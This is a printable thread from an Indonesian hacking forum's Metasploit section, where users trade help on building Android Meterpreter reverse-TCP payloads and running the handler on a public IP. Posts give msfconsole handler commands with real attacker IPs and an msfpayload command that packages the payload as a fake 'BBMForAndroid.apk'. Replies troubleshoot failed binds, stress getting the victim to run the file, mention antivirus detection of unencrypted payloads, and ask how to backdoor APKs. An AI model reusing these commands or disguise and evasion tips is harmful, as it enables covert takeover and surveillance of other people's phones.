Indonesian Back|Track Team
Share Exploit Android Meterpreter IP Public - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Share Exploit Android Meterpreter IP Public (/thread-5525.html)

Pages: 1 2 3 4 5


RE: Exploit Android Meterpreter IP Public - eMJe009 - 04-21-2014

(04-19-2014, 10:58 PM)wine trochanter Wrote:
(04-19-2014, 07:14 PM)eMJe009 Wrote:
(04-19-2014, 06:28 PM)sonyrimawan Wrote:
(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin

failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.

failed pas jalanin exploitnya Big Grin
[-] Handler failed to bind to 95.xxx.xxx.xx:123

emang gtu kok kalo ane om, tp klo udh di eksekusi sama korban langsung kebuka sesi meterpreter nya Big Grin

tak kira ada kesalahan instalasi metasploitnya Big Grin


RE: Exploit Android Meterpreter IP Public - zee eichel - 04-28-2014

(04-21-2014, 05:17 PM)eMJe009 Wrote: [-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

tak kira ada kesalahan instalasi metasploitnya Big Grin

itu memang salah setting di ip address karena metasploit jadi gagal untuk melakukan binding sehingga seharusnya jika sukses

Code:
[*] Started reverse handler on 95.xxx.xxx.xx:123

.. cek apakah vps/host memang menggunakan ip 95.xxx.xxx.xx sebagai primary IP.


RE: Exploit Android Meterpreter IP Public - eMJe009 - 04-29-2014

(04-28-2014, 12:47 AM)zee eichel Wrote:
(04-21-2014, 05:17 PM)eMJe009 Wrote: [-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

tak kira ada kesalahan instalasi metasploitnya Big Grin

itu memang salah setting di ip address karena metasploit jadi gagal untuk melakukan binding sehingga seharusnya jika sukses

Code:
[*] Started reverse handler on 95.xxx.xxx.xx:123

.. cek apakah vps/host memang menggunakan ip 95.xxx.xxx.xx sebagai primary IP.

ow, pantes tetep nggak berhasil Big Grin, terimakasih om zee, tak coba coba lagi Big Grin


RE: Exploit Android Meterpreter IP Public - sonyrimawan - 07-07-2014

(04-29-2014, 08:38 PM)eMJe009 Wrote:
(04-28-2014, 12:47 AM)zee eichel Wrote:
(04-21-2014, 05:17 PM)eMJe009 Wrote: [-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

tak kira ada kesalahan instalasi metasploitnya Big Grin

itu memang salah setting di ip address karena metasploit jadi gagal untuk melakukan binding sehingga seharusnya jika sukses

Code:
[*] Started reverse handler on 95.xxx.xxx.xx:123

.. cek apakah vps/host memang menggunakan ip 95.xxx.xxx.xx sebagai primary IP.

ow, pantes tetep nggak berhasil Big Grin, terimakasih om zee, tak coba coba lagi Big Grin

yups benar sekali kata om zee, check dulu vpsnya. dan pastikan payload di eksekusi oleh korban Big Grin


RE: Exploit Android Meterpreter IP Public - inggi rivermaya 172 - 03-10-2015

om om, klo error gini gimana y -fix nya
msfpayload android/meterpreter/reverse_tcp LHOST= 36.79.205.74 LPORT=123 R > BBMForAndroid.apk
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Error generating payload: The following options failed to validate: LHOST.


RE: Exploit Android Meterpreter IP Public - inggi rivermaya 172 - 03-10-2015

oh iyak sy laptopnya pake vga card INTEL HD 4600 dual sama nvidia gtx 765m
dan kedetect di kali linuk yg intel hd, tapi di layar laptop screen resolution saya kok ndak bisa di rendahin ya? mentok ke 1920 X 1080 16:9 resolution, itu gimana cara rendahinnya? bisa cepat habis batrei laptop sy trus kerna layar laptop sy 13'' inchi di resolution segitu tulisan kecill bgt , bisa bantu nda nih? atau hrus install driver apa gitu? om brother ini niy
http://i1322.photobucket.com/albums/u577/Inggi_Rivermaya_Nirvana/Screenshot%20from%202015-03-10%20130858_zps73ut7bry.png
http://i1322.photobucket.com/albums/u577/Inggi_Rivermaya_Nirvana/Screenshot%20from%202015-03-10%20131646_zpsyog68d9x.png
laptop sy xenom siren sr13 cto a.k.a w23ost


RE: Exploit Android Meterpreter IP Public - Psytrap - 03-10-2015

Gambarrnyaaa pada ngacirrr omm.....................................re-upload gambarnya lagi om :3


RE: Exploit Android Meterpreter IP Public - inggi rivermaya 172 - 03-10-2015

(03-10-2015, 03:26 PM)Psytrap Wrote: Gambarrnyaaa pada ngacirrr omm.....................................re-upload gambarnya lagi om :3

ini niy [Image: Screenshot%20from%202015-03-10%20130858_zps73ut7bry.png]
sama ini
[Image: Screenshot%20from%202015-03-10%20131646_zpsyog68d9x.png]

ini forum kan ngebahas 70% ngebahas backtrack la user dah hijrah ke kali linux, trus bisa Nda smua tutorial backtrack di jalanin di kali linux, kan beda mbah


RE: Exploit Android Meterpreter IP Public - inggi rivermaya 172 - 03-11-2015

(03-10-2015, 05:27 PM)inggi rivermaya 172 Wrote:
(03-10-2015, 03:26 PM)Psytrap Wrote: Gambarrnyaaa pada ngacirrr omm.....................................re-upload gambarnya lagi om :3

ini niy [Image: Screenshot%20from%202015-03-10%20130858_zps73ut7bry.png]
sama ini
[Image: Screenshot%20from%202015-03-10%20131646_zpsyog68d9x.png]

ini forum kan ngebahas 70% ngebahas backtrack la user dah hijrah ke kali linux, trus bisa Nda smua tutorial backtrack di jalanin di kali linux, kan beda mbah

dan ini ngefixnya gimana ya msfconsole saya kok begini? apa yg salah dg kode nya? kmaren sempat frustasi sy instal defencinya gara gara gemnya minta update ruby ke versi 2.1
setelah di install dan ok, tapi server ya
[Image: Screenshot%20from%202015-03-11%20111335_zpsu4cvkedx.png]
mohon dibantu para temen temen grup


RE: Exploit Android Meterpreter IP Public - wawan740 - 03-09-2016

nah klo nyisipin backdor ke file apknya gmna bro?